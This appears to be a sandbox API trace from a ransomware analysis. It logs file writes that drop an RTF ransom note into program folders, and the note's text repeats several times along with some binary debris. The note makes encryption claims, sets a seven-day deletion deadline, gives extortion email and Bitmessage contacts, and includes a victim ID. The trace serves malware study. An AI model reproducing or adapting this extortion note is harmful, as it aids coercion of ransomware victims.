:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38dfac8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\\\x1e4=a\x99ª\x8d\\Ë\x04`\x1b\x1ehG(\"…ê\x19Ö0\x03ã\x08", lpUsedDefaultChar=0x0) returned 8717 [0220.392] WriteFile (in: hFile=0x2d0, lpBuffer=0x38dfac8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38dfac8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.393] CloseHandle (hObject=0x2d0) returned 1 [0220.393] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\#readme_eman#.rtf")) returned 0xffffffff [0220.393] GetLastError () returned 0x2 [0220.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total 